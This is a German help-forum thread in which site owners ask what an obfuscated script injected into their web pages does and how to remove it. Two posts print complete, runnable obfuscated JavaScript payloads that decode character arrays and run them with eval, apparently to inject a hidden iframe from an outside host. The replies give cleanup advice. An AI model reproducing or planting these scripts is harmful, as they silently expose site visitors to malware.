|
Schadstoffcode iauf meinem Webserver Hi, ich habe heute auf meinem Webserver folgenden Schadstoffcode entdeckt. Leider ist der Verschlüsselt. Kennt den jemand zbw. kann mir einer Sagen was er genau macht? HTML-Code: <!--adea77--><script type="text/javascript" language="javascript" > if(021===0x11)v="va"+"l";try{faweb--}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,111,103,107,100,119,32,60,37,103,110,109,103,107,99,95,114,98,52,51,50,102,38,57,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,101,114,112,45,103,122,97,95,107,110,107,111,113,108,105,98,120,97,45,102,111,108,99,46,111,106,47,96,98,109,104,108,105,114,114,114,96,114,111,113,45,99,110,107,112,110,108,101,109,114,115,46,97,111,108,93,99,110,108,102,104,101,47,113,99,101,107,44,112,103,110,39,58,11,10,31,95,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,95,46,114,114,121,107,99,46,97,109,114,99,99,114,31,59,32,38,46,39,58,11,10,31,95,46,114,114,121,107,99,46,103,99,105,102,102,116,31,59,32,38,47,112,119,37,59,12,8,32,96,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,107,99,102,115,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,115,109,112,31,59,32,38,47,112,119,37,59,12,8,13,9,30,105,101,38,97,111,103,107,100,119,61,60,37,39,40,30,123,9,30,32,117,95,114,31,112,101,114,110,111,109,113,101,31,59,32,38,99,114,113,109,114,38,57,10,31,123,10,31,103,102,39,31,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,96,98,112,107,37,41,40,11,10,31,121,13,9,30,100,110,97,117,108,99,110,115,44,119,113,103,116,100,38,39,59,98,105,117,30,105,99,59,92,38,95,100,111,106,92,38,60,60,46,98,105,117,60,39,40,57,13,9,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,96,98,112,107,37,41,45,95,112,111,99,110,99,65,104,104,106,100,39,95,41,58,11,10,31,123,13,9,123,41,39,39,59);}w=f;s=[];r=String;for(i=0;-i+535!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");}</script><!--/adea77--> |
Das was du hier zeigst ist lediglich der HTML Tag für Javascript,poste lieber den Code der zwischen den <Script> und </Script> steht. |
das teil verbindet zumindest schon mal auf nen ftp server, danach gehts nicht weiter, guck gleich noch mal |
a server ist leer, aber nicht mal passwort geschützt :d |
Meinst den Verver von der Schadstoffware? |
jo, das script verbindet zu einem ftp server, der als endung .pl hatt hab aber keine whois info abfrage gemacht, weis also nicht, ob er auch in polen steht. |
Könntest du mir den Entschlüsselten Code mal an meine PN Box schicken? Würde gerne mal Sehen, was da reingeschrieben wurde. |
da mal hochladen jsunpack - a generic JavaScript unpacker |
Zitat:
|
@markusg Danke für deine Infos und den Link! |
kein prob. du solltest sicherheitslücken auf dem server schließen, zb wenn du wordpress nutzt, unnötige plugins rausschmeißen, etc, wenn man genaueres wüsste, könnte man da evtl. noch mehr sagen was zu tun ist. |
Dieses Ding verbreitet sich sehr schnell. Habe den Code jetzt schon auf 2 verschiedenen Seiten auf meinem Server entdeckt. Und wenn man googlet findet man haufenweise betroffene Seiten. Ich weiß aber nicht wie ich es weg kriege. Einfaches löschen hilft nix. Auch Umzug, Umbenennen der Variablen oder bearbeiten der Upload Variablen hat nichts gebracht. Der Code war noch einiger Zeit wieder da. Der Link zum entschlüsseln hat mir übrigens nicht viel Erkenntnis gebracht. Hat denn schon jemand weitere Infos, wo das Ding her kommt und vor allem wie es auf die Seiten kommt? |
schließe alle sicherheitslücken in genutzten cms, evtl. sicherheitslücken des servers schließen, passwörter endern, evtl. pc hier mal im bereich plagegeister auf malware untersuchen lassen. |
Zitat:
|
Glaub mir... ich habe eine Menge unternommen. Ich habe wie gesagt, sämtliche PHP Dateien durchsucht, ich habe Upload Variablen umbenannt, ich habe alle Passwörter geändert. CMS nutze ich nicht. Ich bin mit der Seite an einen anderen Ort umgezogen. Jetzt habe ich das Teil woanders gefunden. Ich frage am Anfang der Seite den LogStatus ab, und wenn es noch keinen Login gab, wird die Default Seite gezeigt. Und mitten in dieser Else Anweisung stand dann der Code. Also an einer Stelle, wo nicht mal etwas per POST oder GET gesendet wird, wo man also nicht mal ein XSS einschleusen könnte. Alsa letzte Instanz bin ich jetzt auf einen anderen Server umgezogen und logge sämtliche Klicks (,also alles was passiert,) auf der Seite mit. Mal gucken ob es nochmal wieder kommt. Aber trotzdem würde mich schon interessieren, wo das Ding herkommt und was der Code macht. Der o.a. Link zum entschlüsseln hat nicht viel erklärt. |
na dann, wie gesagt, unsichere passwörter, oder dein pc ist infiziert. wenn es noch der selbe code ist, und er nicht geendert wurde, um auf eine neue seite zu verbinden, macht er, wie gesagt nichts, denn bei der analyse hat er auf einen leeren ftp server weitergeleitet. |
Mein FTP Pw ist sicher, habs auch extra nochmal geändert. Wenn jemand den FTP Zugang zu meinem Server (Rechenzentrum) hätte, käönnte er deutlich mehr Schaden anrichten. Aber der Code ist komischerweise nur auf der Seite von einem Kunden drauf. Und der hat nicht mal FTP Zugang. Also habe ich ja XSS getippt, was ich aber programmatisch ausgeschlossen habe. Deswegen bin ich ja verwirrt, dass der Code wieder da war. Naja.. jetzt ist er erstmal weg, aber die Backdoor habe ich noch nicht gefunden. |
Zitat:
Ein Viagra-Spam-Versender hat zum Beispiel doch gar kein Interesse daran, die benutzten Server oder auch Opfer (Ziele) zu stören, der will sein Anliegen durchziehen. Und wenn jemand z.B. Surfer mit Schadcode von einem ukrainischen Server beglücken wollte oder zu illegalen Sites leiten oder locken will, so wäre es kontraproduktiv seinen Lockstandort (deine Seite, vermutlich meinst du aber Site) zu zerstören. |
Moin, mein erster Post, obwohl ich seit Jahren sporadisch hier mitlese. Also höchste Zeit... ;) Den Java-Script-Schadcode hatte ich auch auf einigen Servern, konnte aber über "grep" die infizierten Dateien ausfindig machen und den Code löschen. Seitdem ist Ruhe. Es wurden alle "index.html" und "index.php" infiziert. :wtf: Der Code war folgender und fast immer direkt am Anfang der Datei: Code: <script>try{document.body++}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(zxc){for(i=0;i-646!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}}</script>lg und schönen Sonntag noch, gecko |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 17:28 Uhr. |
Copyright ©2000-2024, Trojaner-Board